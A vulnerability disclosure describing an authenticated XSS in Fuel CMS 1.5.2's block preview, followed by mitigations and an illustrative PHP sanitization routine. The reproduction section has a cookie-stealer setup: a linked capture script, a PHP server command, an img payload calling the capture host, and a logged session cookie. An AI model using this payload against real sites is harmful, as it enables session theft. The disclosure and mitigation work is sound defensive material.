Authenticated XSS in block preview
Fuel CMS 1.5.2 uses a text editor for publishing pages and creating blocks. This editor has a preview feature that allows a moderator/admin to show a preview of the post before posting it.
This feature is vulnerable to XSS: if a user embeds malicious JavaScript in the block content, it is executed as soon as the post is previewed.
Reproduce
To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.
Save the following file as capture.php:
https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Launch a PHP server to serve this file:
php -S 0.0.0.0:1718
Login to FuelCMS and go to the blocks section of the CMS:
http://127.0.0.1/fuelcms/fuel/blocks
Create a block and then open it for edit:
http://127.0.0.1/fuelcms/fuel/blocks/edit/1
In the view field, where you have a larger textarea for editing the document, write the following payload & save it:
<img src='http://127.0.0.1:1718/capture.php' alt='dune'>
Now, click on the "Preview" button and you will get connections in your PHP server:
[Wed Jan 8 10:09:20 2025] 127.0.0.1:53440 Accepted
[Wed Jan 8 10:09:20 2025] 127.0.0.1:53440 [200]: GET /capture.php
[Wed Jan 8 10:09:20 2025] 127.0.0.1:53440 Closing
Open cookie_log.txt and you shall see the cookies that were stolen:
[2025-01-08 15:09:20] Cookies: _ga_90PNJH7CQ5=GS1.1.1735826854.1.1.1735826858.0.0.0; _ga=GA1.1.305814098.1735826855; ci_session=r0qirem7e4s1ascfhp4v60a82i02vlnr
Mitigation steps
Sanitize Input: Use a library like HTMLPurifier to sanitize user input and strip dangerous tags and attributes before saving to the database
Encode Output: Ensure all user-generated content is encoded with htmlspecialchars() or similar before rendering to prevent script execution
Restrict Allowed HTML: Implement a whitelist of safe HTML tags and attributes to allow only essential formatting in the preview
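The following PHP snippet is an added illustration of the three mitigation steps above; it is not code from the Fuel CMS project. It shows the two ways the preview can render block content safely: encoding it as inert text with htmlspecialchars(), or, where formatting must survive, passing it through an allowlist filter (built here on DOMDocument rather than HTMLPurifier) that keeps only a handful of tags and attributes and drops everything else, including the remote <img> from the report and any on* handler or javascript: link. The function names, the ALLOWED_TAGS list and the sample block content are assumptions made for this example.

```php
<?php
// Added example, not part of Fuel CMS: two safe ways to render untrusted
// block content in a preview.

// 1) Encode output: the content is shown verbatim as text, never parsed as HTML.
function renderPreviewEncoded(string $content): string
{
    // ENT_QUOTES also encodes single quotes (the report's payload uses them);
    // ENT_SUBSTITUTE keeps invalid UTF-8 from silently blanking the preview.
    return htmlspecialchars($content, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// 2) Restrict allowed HTML: tag => list of permitted attributes. This list is an
//    assumption for the example; tune it to what the editor really needs.
const ALLOWED_TAGS = [
    'p' => [], 'br' => [], 'strong' => [], 'em' => [], 'ul' => [], 'ol' => [],
    'li' => [], 'h2' => [], 'h3' => [], 'a' => ['href'],
];

function renderPreviewFiltered(string $content): string
{
    $doc = new DOMDocument();
    // The <?xml encoding> prefix makes libxml treat the input as UTF-8; the
    // wrapper div lets us return only the fragment afterwards.
    $ok = @$doc->loadHTML(
        '<?xml encoding="UTF-8"><div>' . $content . '</div>',
        LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD
    );
    if (!$ok) {
        return '';
    }
    $root = $doc->getElementsByTagName('div')->item(0); // our wrapper, first in document order
    if ($root === null) {
        return '';
    }
    sanitizeNode($root, $doc);
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

function sanitizeNode(DOMNode $node, DOMDocument $doc): void
{
    // Iterate over a static copy, because the live child list is mutated below.
    foreach (iterator_to_array($node->childNodes) as $child) {
        if ($child instanceof DOMElement) {
            $tag = strtolower($child->tagName);
            if (!isset(ALLOWED_TAGS[$tag])) {
                // Unlisted tag (img, script, iframe, ...): keep only its text so no
                // markup survives; an <img> contributes nothing.
                $node->replaceChild($doc->createTextNode($child->textContent), $child);
                continue;
            }
            // Drop every attribute not on the allowlist; on* handlers and style
            // are removed here because they are never listed.
            foreach (iterator_to_array($child->attributes) as $attr) {
                $name = strtolower($attr->name);
                if (!in_array($name, ALLOWED_TAGS[$tag], true)
                    || ($name === 'href' && !isSafeUrl($attr->value))) {
                    $child->removeAttribute($attr->name);
                }
            }
            sanitizeNode($child, $doc);
        } elseif (!($child instanceof DOMText)) {
            // Comments and processing instructions have no place in a preview.
            $node->removeChild($child);
        }
    }
}

function isSafeUrl(string $url): bool
{
    // Relative links and http(s)/mailto only; rejects javascript:, data:, etc.
    $scheme = parse_url(trim($url), PHP_URL_SCHEME);
    return $scheme === null || in_array(strtolower($scheme), ['http', 'https', 'mailto'], true);
}

// Constructed sample: the report's payload plus an inline event handler.
$sample = "<p>Hello <b onclick='alert(1)'>world</b></p>"
        . "<img src='http://127.0.0.1:1718/capture.php' alt='dune'>";

echo renderPreviewEncoded($sample), "\n";   // everything shown as literal text
echo renderPreviewFiltered($sample), "\n";  // <p>Hello world</p> : b and img removed
```

The encoded form is the right default for a preview of raw source; the filtered form is for a WYSIWYG preview that must keep formatting. In both cases the filtering happens at render time, so content already stored in the database from before the fix is covered as well.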
Contact me
hkohi.ca | [email protected]